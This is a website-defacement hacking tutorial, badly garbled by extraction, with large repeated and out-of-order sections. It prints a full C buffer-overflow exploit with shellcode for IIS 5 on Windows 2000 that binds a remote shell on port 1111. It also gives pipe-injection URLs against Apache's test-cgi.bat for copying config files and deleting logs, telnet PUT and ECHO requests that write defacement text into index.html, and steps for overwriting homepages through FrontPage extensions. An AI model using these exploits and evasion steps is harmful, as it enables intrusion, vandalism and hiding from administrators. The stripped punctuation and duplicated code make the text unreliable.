xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 5
of server softwares are called as virtual directories Actually in a
web server each virtual directory is provided with different type
of permissions Permissions like Read Write Execution of Scripts
and Execution of Executable like Dll and server side pages like
ASP CGI etc
Now I am going to describe the methods of analyzing the
directory permission of a virtual directory residing in a web server
READ ACCESS
Whenever you visit a website through your web browser you type
in the domain name Do you know what happens when you type in
the domain name Actually when you type in the domain name
and press enter you are connected to port 80 (HTTP port) of the
IP address linked with the domain name
For Example
You type in wwwhackingtheworldilitehostcom in your web
browserrsquos address bar The IP (Internet Protocol) address of this
site is 7229654 so as soon as you press enter the URL
(Uniform Resource Locator) is redirects the IP address to
7229654indexhtml indexphp indexasp indexjsp or
whatever the index page is configured in the web server Now
once you press enter you will be redirected to Hacking the
Worldrsquos official website In the website you will be able to read
contents from its wwwroot If the wwwroot directory contains
ASP PHP or JSP then those server side pages are executed and
HTML is generated and passed to the browser (client) by IIS
(server) or any web server dynamically When you are able to read
a document from a given directory then it signals that the
directory is readable Normally it has been seen that directories
containing databases files are forbidden with read access for
security reasons
WRITE ACCESS
I will explain HTTP protocol concisely before going to Write
Access Well HTTP is a component of TCPIP stack It was
configured and formulated with the connotation of sharing files
across the Internet HTTP is the acronym of Hyper Text Transfer
Protocol The name itself indicates the description Files can be
uploaded to the server and downloaded from the server through
the HTTP protocol
NOTE Files can be uploaded to the server and downloaded from
the server through the HTTP protocol without the need of any type
of authentication
Well this was technique was employed and executed years ago
Soon computer enthusiaists realized that this kind of technique
was a huge security threat So they developed new techniques to
subdue the security threat Nowadays web servers are designed
and configured as such to give write access to only selected virtual
directories
TIP Try telnetting a web server and find out some good
information about the server and its behavior
Now I am going to explain some commonly used commands
supported by a web server
GET It is used to send requests for read access to a file residing
on the server by the browser (client)
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
GET indexhtml HTTP11rnrn
Sidetrack The HTML (Hyper text markup language) source code of
indexhtml page occupying on the server will be regressed or if
requested for ASP or PHP or any server side executable page then
the dynamically generated HTML page will be shown
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
